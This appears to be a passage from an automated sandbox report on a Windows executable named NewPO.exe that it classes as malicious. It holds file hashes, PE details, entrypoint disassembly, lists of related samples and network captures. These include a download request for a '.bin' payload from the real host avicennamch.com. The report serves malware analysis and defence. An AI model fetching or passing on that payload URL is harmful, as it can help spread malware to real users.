        https://avicennamch.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=2.9.7NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/registration-and-affiliation/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        136.243.220.59
        avicennamch.comGermany
        24940HETZNER-ASDEtrue

        General Information

        Joe Sandbox Version:32.0.0 Black Diamond
        Analysis ID:410970
        Start date:11.05.2021
        Start time:13:59:57
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 7m 57s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:NewPO.com (renamed file extension from com to exe)
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:18
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal92.rans.troj.evad.winEXE@2/0@1/1
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 60.8% (good quality ratio 49.9%)
        • Quality average: 37.4%
        • Quality standard deviation: 22.6%
        HCA Information:Failed
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Override analysis time to 240s for sample files taking high CPU consumption
        Warnings:
        Show All
        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
        • HTTP Packets have been reduced
        • TCP Packets have been reduced to 100
        • Excluded IPs from analysis (whitelisted): 13.88.21.125, 92.122.145.220, 52.147.198.201, 13.64.90.137, 20.50.102.62, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.143.16, 52.155.217.156, 20.54.26.129, 93.184.220.29
        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, ocsp.digicert.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        14:02:40API Interceptor81x Sleep call for process: NewPO.exe modified

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASN

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        HETZNER-ASDE2200740b_by_Libranalysis.dllGet hashmaliciousBrowse
        • 188.40.137.206
        bc151f99_by_Libranalysis.dllGet hashmaliciousBrowse
        • 188.40.137.206
        4445fc83_by_Libranalysis.dllGet hashmaliciousBrowse
        • 188.40.137.206
        248e9822_by_Libranalysis.dllGet hashmaliciousBrowse
        • 188.40.137.206
        29deac0b_by_Libranalysis.dllGet hashmaliciousBrowse
        • 188.40.137.206
        ez1GrEltKk.exeGet hashmaliciousBrowse
        • 116.203.253.214
        hO1Gw852iu.dllGet hashmaliciousBrowse
        • 188.40.137.206
        pmGnweaDOF.dllGet hashmaliciousBrowse
        • 188.40.137.206
        YaCIHO325t.dllGet hashmaliciousBrowse
        • 188.40.137.206
        a5c8cLnSs5.dllGet hashmaliciousBrowse
        • 188.40.137.206
        9392XSxSaf.dllGet hashmaliciousBrowse
        • 188.40.137.206
        758619ea_by_Libranalysis.dllGet hashmaliciousBrowse
        • 188.40.137.206
        6790bc61_by_Libranalysis.dllGet hashmaliciousBrowse
        • 188.40.137.206
        sCWXdbS7XR.exeGet hashmaliciousBrowse
        • 88.99.66.31
        COPY OF N-N.exeGet hashmaliciousBrowse
        • 94.130.249.226
        851f3725_by_Libranalysis.dllGet hashmaliciousBrowse
        • 188.40.137.206
        b210a658_by_Libranalysis.dllGet hashmaliciousBrowse
        • 188.40.137.206
        7b47fa9d_by_Libranalysis.dllGet hashmaliciousBrowse
        • 188.40.137.206
        abc0c4ee_by_Libranalysis.dllGet hashmaliciousBrowse
        • 188.40.137.206
        15e799a8_by_Libranalysis.dllGet hashmaliciousBrowse
        • 188.40.137.206

        JA3 Fingerprints

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        37f463bf4616ecd445d4a1937da06e19755c95c8_by_Libranalysis.exeGet hashmaliciousBrowse
        • 136.243.220.59
        Wave Browser_ajpko2tb_.exeGet hashmaliciousBrowse
        • 136.243.220.59
        98c87992_by_Libranalysis.exeGet hashmaliciousBrowse
        • 136.243.220.59
        scan of invoice 6585050.xlsmGet hashmaliciousBrowse
        • 136.243.220.59
        H0kDylXIaQ.exeGet hashmaliciousBrowse
        • 136.243.220.59
        ynOGsVwsoJ.exeGet hashmaliciousBrowse
        • 136.243.220.59
        NEW PO - CE AUSTRALIA PTY LTD.xlsGet hashmaliciousBrowse
        • 136.243.220.59
        t2yTd64U6V.exeGet hashmaliciousBrowse
        • 136.243.220.59
        eF23VSPJ5V.exeGet hashmaliciousBrowse
        • 136.243.220.59
        866WzPfS3E.exeGet hashmaliciousBrowse
        • 136.243.220.59
        2513bdc6_by_Libranalysis.xlsmGet hashmaliciousBrowse
        • 136.243.220.59
        EsrmJ6Va6u.exeGet hashmaliciousBrowse
        • 136.243.220.59
        Shipment Information.xlsGet hashmaliciousBrowse
        • 136.243.220.59
        PO.xlsGet hashmaliciousBrowse
        • 136.243.220.59
        Purchase Order-1245102021.xlsGet hashmaliciousBrowse
        • 136.243.220.59
        b9178202_by_Libranalysis.exeGet hashmaliciousBrowse
        • 136.243.220.59
        New order list.exeGet hashmaliciousBrowse
        • 136.243.220.59
        Z9LoM9MPDL.exeGet hashmaliciousBrowse
        • 136.243.220.59
        8fsURJpygc.exeGet hashmaliciousBrowse
        • 136.243.220.59
        zy5tMPMucl.exeGet hashmaliciousBrowse
        • 136.243.220.59

        Dropped Files

        No context

        Created / dropped Files

        No created / dropped files found

        Static File Info

        General

        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):5.681604389236544
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.15%
        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:NewPO.exe
        File size:110592
        MD5:d4f1e0ced899708fdd34faab5f154ff3
        SHA1:1d85ab627f08d4de28ba77623259d449f41f7112
        SHA256:6218efd8433d165f2a8cc049395a53d1f0eb04f10e0ddc1f9a2c70b919b84dbd
        SHA512:fe0dd766ac8d6bbfc8d0fe4e416122501a0163b23262814fdcfae1de60f95e1d126ae04b3fe0a13051d0949717fd67689fab188c1df75cf0d9fef28fd56b7631
        SSDEEP:1536:jzFQ30+2EUZn/oGirSub7w8ozyNup80vnrAC6roHa5zWFAPQzMTI:/R+JUZv2SuFA/pXrApoWAMs
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...z.^T.....................0......,.............@................

        File Icon

        Icon Hash:20047c7c70f0e004

        Static PE Info

        General

        Entrypoint:0x40162c
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        DLL Characteristics:
        Time Stamp:0x545E9A7A [Sat Nov 8 22:34:34 2014 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:aa9238523bf06888358b073ba6a8b5c3

        Entrypoint Preview

        Instruction
        push 00401D58h
        call 00007FB528738953h
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        xor byte ptr [eax], al
        add byte ptr [eax], al
        inc eax
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add bl, dl
        call 00007FB532E82FFCh
        pop eax
        inc esi
        mov es, word ptr [esp+edi*2+55B91FFFh]
        clc
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add dword ptr [eax], eax
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        inc ebp
        outsb
        je 00007FB5287389D4h
        outsb
        arpl word ptr [eax+6Dh], bp
        outsb
        je 00007FB5287389D5h
        xor al, byte ptr [eax]
        add byte ptr [eax], al
        add byte ptr [eax], al
        add bh, bh
        int3
        xor dword ptr [eax], eax
        daa
        ror byte ptr [edx+6Ah], FFFFFF98h
        stc
        pop ebp
        push ebx
        inc ebx
        cmp dword ptr [ebp-017ACA5Dh], E6AB0F67h
        sub al, 4Ah
        pushad
        lahf
        inc edi
        mov dword ptr [C6420E86h], eax
        mov edi, 4F3AD156h
        lodsd
        xor ebx, dword ptr [ecx-48EE309Ah]
        or al, 00h
        stosb
        add byte ptr [eax-2Dh], ah
        xchg eax, ebx
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        sbb eax, dword ptr [esi]
        add byte ptr [eax], al
        dec edx
        add byte ptr [eax], al
        add byte ptr [eax], al
        or al, 00h
        push ebp
        push edx
        dec edi
        push ebx
        dec ecx
        inc edi
        dec esi
        inc ecx
        dec esp
        inc ebp
        push edx
        push ebx
        add byte ptr [68000801h], cl
        popad

        Data Directories

        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x17d940x28.text
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1b0000x97c.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
        IMAGE_DIRECTORY_ENTRY_IAT0x10000x120.text
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

        Sections

        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x172580x18000False0.379465738932data6.04771794881IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        .data0x190000x12a80x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
        .rsrc0x1b0000x97c0x1000False0.177978515625data2.0654411644IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

        Resources

        NameRVASizeTypeLanguageCountry
        RT_ICON0x1b84c0x130data
        RT_ICON0x1b5640x2e8data
        RT_ICON0x1b43c0x128GLS_BINARY_LSB_FIRST
        RT_GROUP_ICON0x1b40c0x30data
        RT_VERSION0x1b1500x2bcdataEnglishUnited States

        Imports

        DLLImport
        MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

        Version Infos

        DescriptionData
        Translation0x0409 0x04b0
        LegalCopyrightLaterBit
        InternalNamecerebri
        FileVersion4.00
        CompanyNameLaterBit
        LegalTrademarksLaterBit
        CommentsLaterBit
        ProductNameEntrenchments2
        ProductVersion4.00
        OriginalFilenamecerebri.exe

        Possible Origin

        Language of compilation systemCountry where language is spokenMap
        EnglishUnited States

        Network Behavior

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        May 11, 2021 14:02:38.906786919 CEST4976480192.168.2.4136.243.220.59
        May 11, 2021 14:02:38.975074053 CEST8049764136.243.220.59192.168.2.4
        May 11, 2021 14:02:38.975224018 CEST4976480192.168.2.4136.243.220.59
        May 11, 2021 14:02:38.975783110 CEST4976480192.168.2.4136.243.220.59
        May 11, 2021 14:02:39.044044971 CEST8049764136.243.220.59192.168.2.4
        May 11, 2021 14:02:39.559333086 CEST8049764136.243.220.59192.168.2.4
        May 11, 2021 14:02:39.559549093 CEST4976480192.168.2.4136.243.220.59
        May 11, 2021 14:02:39.565530062 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:39.636590004 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:39.636706114 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:39.656506062 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:39.729374886 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:39.729846954 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:39.729871035 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:39.729887962 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:39.729899883 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:39.729980946 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:39.730021954 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:39.731117010 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:39.731218100 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:39.814605951 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:39.886035919 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:39.886130095 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:39.904278994 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.014420986 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.590742111 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.590771914 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.590784073 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.590795994 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.590807915 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.590821028 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.590837955 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.590852976 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.590868950 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.590884924 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.590967894 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.591020107 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.662051916 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662077904 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662090063 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662102938 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662123919 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662142038 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662158012 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662173986 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662190914 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662206888 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662210941 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.662282944 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.662478924 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662496090 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662508011 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662525892 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662542105 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662552118 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.662559032 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662575006 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662595034 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662599087 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.662611961 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662627935 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.662631989 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.662672043 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.662703991 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.733324051 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733361006 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733378887 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733409882 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733422995 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.733428001 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733443022 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733460903 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733464956 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.733479977 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733496904 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733513117 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733527899 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733536959 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.733545065 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733561039 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733565092 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.733577013 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733589888 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733592987 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.733607054 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733623028 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733629942 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.733639002 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733654976 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733658075 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.733668089 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733684063 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733684063 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.733695984 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733715057 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733726978 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.733731985 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733747005 CEST44349765136.243.220.59192.168.2.4
        May 11, 2021 14:02:40.733751059 CEST49765443192.168.2.4136.243.220.59
        May 11, 2021 14:02:40.733778000 CEST49765443192.168.2.4136.243.220.59

        UDP Packets

        TimestampSource PortDest PortSource IPDest IP
        May 11, 2021 14:00:37.081784010 CEST5912353192.168.2.48.8.8.8
        May 11, 2021 14:00:37.133352041 CEST53591238.8.8.8192.168.2.4
        May 11, 2021 14:00:38.638864994 CEST5453153192.168.2.48.8.8.8
        May 11, 2021 14:00:38.697953939 CEST53545318.8.8.8192.168.2.4
        May 11, 2021 14:00:38.900281906 CEST4971453192.168.2.48.8.8.8
        May 11, 2021 14:00:38.949104071 CEST53497148.8.8.8192.168.2.4
        May 11, 2021 14:00:40.259315968 CEST5802853192.168.2.48.8.8.8
        May 11, 2021 14:00:40.318461895 CEST53580288.8.8.8192.168.2.4
        May 11, 2021 14:00:41.163773060 CEST5309753192.168.2.48.8.8.8
        May 11, 2021 14:00:41.212543964 CEST53530978.8.8.8192.168.2.4
        May 11, 2021 14:00:42.649270058 CEST4925753192.168.2.48.8.8.8
        May 11, 2021 14:00:42.700776100 CEST53492578.8.8.8192.168.2.4
        May 11, 2021 14:00:43.874295950 CEST6238953192.168.2.48.8.8.8
        May 11, 2021 14:00:43.926654100 CEST53623898.8.8.8192.168.2.4
        May 11, 2021 14:00:45.716795921 CEST4991053192.168.2.48.8.8.8
        May 11, 2021 14:00:45.768399000 CEST53499108.8.8.8192.168.2.4
        May 11, 2021 14:00:46.838300943 CEST5585453192.168.2.48.8.8.8
        May 11, 2021 14:00:46.889925003 CEST53558548.8.8.8192.168.2.4
        May 11, 2021 14:00:48.291795969 CEST6454953192.168.2.48.8.8.8
        May 11, 2021 14:00:48.343457937 CEST53645498.8.8.8192.168.2.4
        May 11, 2021 14:01:07.056642056 CEST6315353192.168.2.48.8.8.8
        May 11, 2021 14:01:07.109478951 CEST53631538.8.8.8192.168.2.4
        May 11, 2021 14:01:08.073002100 CEST5299153192.168.2.48.8.8.8
        May 11, 2021 14:01:08.121879101 CEST53529918.8.8.8192.168.2.4
        May 11, 2021 14:01:09.285453081 CEST5370053192.168.2.48.8.8.8
        May 11, 2021 14:01:09.334151983 CEST53537008.8.8.8192.168.2.4
        May 11, 2021 14:01:10.151676893 CEST5172653192.168.2.48.8.8.8
        May 11, 2021 14:01:10.201766014 CEST53517268.8.8.8192.168.2.4
        May 11, 2021 14:01:10.271625996 CEST5679453192.168.2.48.8.8.8
        May 11, 2021 14:01:10.335701942 CEST53567948.8.8.8192.168.2.4
        May 11, 2021 14:01:11.115482092 CEST5653453192.168.2.48.8.8.8
        May 11, 2021 14:01:11.171792030 CEST53565348.8.8.8192.168.2.4
        May 11, 2021 14:01:12.736295938 CEST5662753192.168.2.48.8.8.8
        May 11, 2021 14:01:12.784992933 CEST53566278.8.8.8192.168.2.4
        May 11, 2021 14:01:13.994450092 CEST5662153192.168.2.48.8.8.8
        May 11, 2021 14:01:14.051794052 CEST53566218.8.8.8192.168.2.4
        May 11, 2021 14:01:15.135827065 CEST6311653192.168.2.48.8.8.8
        May 11, 2021 14:01:15.187649965 CEST53631168.8.8.8192.168.2.4
        May 11, 2021 14:01:20.871428967 CEST6407853192.168.2.48.8.8.8
        May 11, 2021 14:01:20.920895100 CEST53640788.8.8.8192.168.2.4
        May 11, 2021 14:01:22.049288988 CEST6480153192.168.2.48.8.8.8
        May 11, 2021 14:01:22.098690987 CEST53648018.8.8.8192.168.2.4
        May 11, 2021 14:01:24.851028919 CEST6172153192.168.2.48.8.8.8
        May 11, 2021 14:01:24.909538031 CEST53617218.8.8.8192.168.2.4
        May 11, 2021 14:01:31.625405073 CEST5125553192.168.2.48.8.8.8
        May 11, 2021 14:01:31.685920954 CEST53512558.8.8.8192.168.2.4
        May 11, 2021 14:01:56.191246986 CEST6152253192.168.2.48.8.8.8
        May 11, 2021 14:01:56.255063057 CEST53615228.8.8.8192.168.2.4
        May 11, 2021 14:02:01.731971025 CEST5233753192.168.2.48.8.8.8
        May 11, 2021 14:02:01.792517900 CEST53523378.8.8.8192.168.2.4
        May 11, 2021 14:02:02.570552111 CEST5504653192.168.2.48.8.8.8
        May 11, 2021 14:02:02.619285107 CEST53550468.8.8.8192.168.2.4
        May 11, 2021 14:02:03.509622097 CEST4961253192.168.2.48.8.8.8
        May 11, 2021 14:02:03.566529989 CEST53496128.8.8.8192.168.2.4
        May 11, 2021 14:02:03.999418020 CEST4928553192.168.2.48.8.8.8
        May 11, 2021 14:02:04.048290014 CEST53492858.8.8.8192.168.2.4
        May 11, 2021 14:02:04.698570967 CEST5060153192.168.2.48.8.8.8
        May 11, 2021 14:02:04.747345924 CEST53506018.8.8.8192.168.2.4
        May 11, 2021 14:02:05.432960987 CEST6087553192.168.2.48.8.8.8
        May 11, 2021 14:02:05.495618105 CEST53608758.8.8.8192.168.2.4
        May 11, 2021 14:02:06.017704010 CEST5644853192.168.2.48.8.8.8
        May 11, 2021 14:02:06.178953886 CEST53564488.8.8.8192.168.2.4
        May 11, 2021 14:02:07.325797081 CEST5917253192.168.2.48.8.8.8
        May 11, 2021 14:02:07.461311102 CEST53591728.8.8.8192.168.2.4
        May 11, 2021 14:02:08.337394953 CEST6242053192.168.2.48.8.8.8
        May 11, 2021 14:02:08.397505045 CEST53624208.8.8.8192.168.2.4
        May 11, 2021 14:02:09.033428907 CEST6057953192.168.2.48.8.8.8
        May 11, 2021 14:02:09.134161949 CEST53605798.8.8.8192.168.2.4
        May 11, 2021 14:02:09.853605032 CEST5018353192.168.2.48.8.8.8
        May 11, 2021 14:02:09.913779020 CEST53501838.8.8.8192.168.2.4
        May 11, 2021 14:02:30.645414114 CEST6153153192.168.2.48.8.8.8
        May 11, 2021 14:02:30.694190979 CEST53615318.8.8.8192.168.2.4
        May 11, 2021 14:02:33.691895962 CEST4922853192.168.2.48.8.8.8
        May 11, 2021 14:02:33.765214920 CEST53492288.8.8.8192.168.2.4
        May 11, 2021 14:02:36.638278961 CEST5979453192.168.2.48.8.8.8
        May 11, 2021 14:02:36.708434105 CEST53597948.8.8.8192.168.2.4
        May 11, 2021 14:02:38.790476084 CEST5591653192.168.2.48.8.8.8
        May 11, 2021 14:02:38.877233982 CEST53559168.8.8.8192.168.2.4

        DNS Queries

        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
        May 11, 2021 14:02:38.790476084 CEST192.168.2.48.8.8.80x3aebStandard query (0)avicennamch.comA (IP address)IN (0x0001)

        DNS Answers

        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
        May 11, 2021 14:02:38.877233982 CEST8.8.8.8192.168.2.40x3aebNo error (0)avicennamch.com136.243.220.59A (IP address)IN (0x0001)

        HTTP Request Dependency Graph

        • avicennamch.com

        HTTP Packets

        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.449764136.243.220.5980C:\Users\user\Desktop\NewPO.exe
        TimestampkBytes transferredDirectionData
        May 11, 2021 14:02:38.975783110 CEST7144OUTGET /osita/bin_ygJfz82.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: avicennamch.com
